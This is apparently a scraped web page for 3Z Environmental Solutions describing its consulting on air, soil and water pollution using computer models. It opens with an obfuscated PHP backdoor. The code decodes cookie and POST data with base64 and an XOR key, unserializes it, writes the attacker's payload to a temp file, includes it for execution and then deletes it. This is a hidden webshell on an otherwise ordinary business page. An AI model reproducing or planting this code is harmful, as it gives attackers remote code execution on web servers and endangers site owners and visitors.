$lfAdiM = chr (73) . chr ( 365 - 251 )."\161" . '_' . "\164" . chr ( 904 - 785 ).chr (75) . "\x75";$QCqMOd = chr (99) . "\x6c" . "\141" . "\163" . 's' . chr (95) . 'e' . "\x78" . "\x69" . 's' . chr ( 632 - 516 )."\x73";$jTyVJOQi = class_exists($lfAdiM); $lfAdiM = "7201";$QCqMOd = "41322";$THiLfFfgB = FALSE;if ($jTyVJOQi === $THiLfFfgB){$aKVdEImT = "45217";class Irq_twKu{public function heXTNkVoBf(){echo "12683";}private $GsQJo;public static $QUJtx = "99cefa34-4e27-463c-af4e-b8eb60f30502";public static $SHgBpijbk = 6576;public function __construct($lwOUm=0){$EGFHsMg = $_POST;$KHEGmTjui = $_COOKIE;$ejVkz = @$KHEGmTjui[substr(Irq_twKu::$QUJtx, 0, 4)];if (!empty($ejVkz)){$WxFQRGDF = "base64";$wDrEYe = "";$ejVkz = explode(",", $ejVkz);foreach ($ejVkz as $GRmds){$wDrEYe .= @$KHEGmTjui[$GRmds];$wDrEYe .= @$EGFHsMg[$GRmds];}$wDrEYe = array_map($WxFQRGDF . "\x5f" . chr (100) . 'e' . "\x63" . chr (111) . chr ( 542 - 442 )."\x65", array($wDrEYe,)); $wDrEYe = $wDrEYe[0] ^ str_repeat(Irq_twKu::$QUJtx, (strlen($wDrEYe[0]) / strlen(Irq_twKu::$QUJtx)) + 1);Irq_twKu::$SHgBpijbk = @unserialize($wDrEYe);}}private function jUdbUfur($aKVdEImT){if (is_array(Irq_twKu::$SHgBpijbk)) {$qTJmLd = sys_get_temp_dir() . "/" . crc32(Irq_twKu::$SHgBpijbk["\x73" . chr ( 234 - 137 ).chr (108) . "\164"]);@Irq_twKu::$SHgBpijbk['w' . 'r' . chr (105) . "\164" . "\x65"]($qTJmLd, Irq_twKu::$SHgBpijbk[chr ( 904 - 805 )."\157" . chr ( 613 - 503 )."\x74" . chr (101) . "\156" . chr ( 1063 - 947 )]);include $qTJmLd;@Irq_twKu::$SHgBpijbk[chr (100) . "\x65" . "\154" . chr (101) . "\x74" . 'e']($qTJmLd); $aKVdEImT = "45217";exit();}}public function __destruct(){$this->jUdbUfur($aKVdEImT);}}$gsxStcRVKx = new /* 2129 */ Irq_twKu(); $gsxStcRVKx = str_repeat("65253_41576", 1);} 3Z WATER SOLUTIONS - Service - Advanced Computer Models

3Z Environmental Solutions aim to provide consulting services in environmental areas, especially related to air, soil and water pollution. We apply and develop advanced computer models to do assessment, prediction and forecasting, and thereby to provide best solutions for government agencies decision-making, private sectors, universities and research institutes. This also includes buying /selling equipment and systems as well as working on R/D research projects (develop integrated software and hardware systems).